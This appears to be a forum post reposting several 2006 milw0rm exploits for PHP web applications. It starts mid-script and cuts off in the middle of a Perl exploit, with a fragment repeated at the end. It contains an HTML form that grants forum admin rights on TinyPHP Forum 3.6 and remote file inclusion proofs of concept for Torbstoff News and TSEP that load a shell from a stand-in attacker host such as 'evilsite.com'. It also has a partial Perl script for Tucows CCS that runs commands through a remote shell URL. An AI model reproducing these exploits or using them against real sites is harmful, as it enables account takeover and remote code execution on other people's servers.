{ echo "exploit succeeded \r\n"; $temp=explode("my_delim",$html); die($temp[1]); } //if you are here echo "exploit failed \r\n"; ?> Black_hat_cr(HCE) TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit Code: TinyPHPForum 3.6 Admin Maker<br> By SirDarckCat from elhacker.net <FORM method=post enctype="multipart/form-data"> Existing User:<INPUT name=uname><br> <INPUT type=file name=userfile style="visibility:HIDDEN"><br> <INPUT type=hidden name=email value="a@b.c"> <input type=hidden name=makeadmin value=true> <input type=hidden name=stat value=true> <input type=hidden name=ulang value=en> <input type=hidden name=uskin value=default> <INPUT type=submit> </FORM> <script language="JavaScript"> document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php"; </script> # milw0rm.com [2006-08-02] vns3curity(HCE) Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability Code: #========================================================== ======= #Torbstoff News 4 <= (pfad) Remote File Inclusion Exploit #========================================================== ====== # | #Critical Level : Dangerous | # | #Venedor site : http://www.torbstoff.de | # | #Version : 4 | # | #========================================================== ======= # #Dork: "Torbstoff News 4" # #========================================================== ======= #Bug in : news.php # #Vlu Code : # # include($pfad . "includes/config.inc.php"); # #========================================================== ======= # #Exploit : # # #http://sitename.com/[Script Path]/news.php?pfad=http://SHELLURL.COM? # #========================================================== ===================== #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa #Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer =========================================================== ====== # milw0rm.com [2006-08-07] vns3curity(HCE) TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability Code: + + + TSEP 0.9.4.2 + + + + Affected Software .: TSEP 0.9.4.2 + Venedor : http://www.tsep.info/ + Class : Remote File Inclusion + Risk : high (Remote File Execution) + Found by : Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/ + Contact : webmaster[at]bb-pcsecurity[.]de + + + + Code /include/copyright.php: + + + <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?> + + + + + $tsep_config["absPath"] is not properly sanitized before being used + + + + Solution: + Include config-File in copyright.php + + + + PoC: + Place a PHPShell on a remote location: + http://evilsite.com/include/tsepversion.txt + + http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd =ls + + + + Greets: + Krini Gonzales (5 YEARS :P) + + [ E O F ] # milw0rm.com [2006-08-01] vns3curity(HCE) Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Vulnerability Code: #!/usr/bin/perl #Tucows Open Project Remote File Inclusion Vulnerablity #Bug Found & Exploit [c]oded By Dr Max Virus #Download:http://developer.tucows.com/code/ccs/downloads/ccs-open-1.2.1015- 2006-209-1337.zip use LWP::UserAgent; $target=@ARGV[0]; $shellsite=@ARGV[1]; $cmdv=@ARGV[2]; if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv) { usg() } header(); while() { print "[Shell] \$"; while (<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request- >new(GET=>$target.'/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/doma inutils.inc.php?_ENV[TCA_HOME]='.$shellsite='.?&'.$cmdv.'='.$cmd)or die "\n\n Failed to Connect, Try again!\n"; $res = $xpl->request($req); $info = $res->content; $info =~ tr/[\n]/[ê]/; if (!$cmd) { print "\nEnter a Command\n\n"; $info =""; } . Code: TinyPHPForum 3.6 Admin Maker<br> By SirDarckCat from elhacker.net <FORM method=post enctype="multipart/form-data"> Existing User:<INPUT name=uname><br>. value=default> <INPUT type=submit> </FORM> <script language="JavaScript"> document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";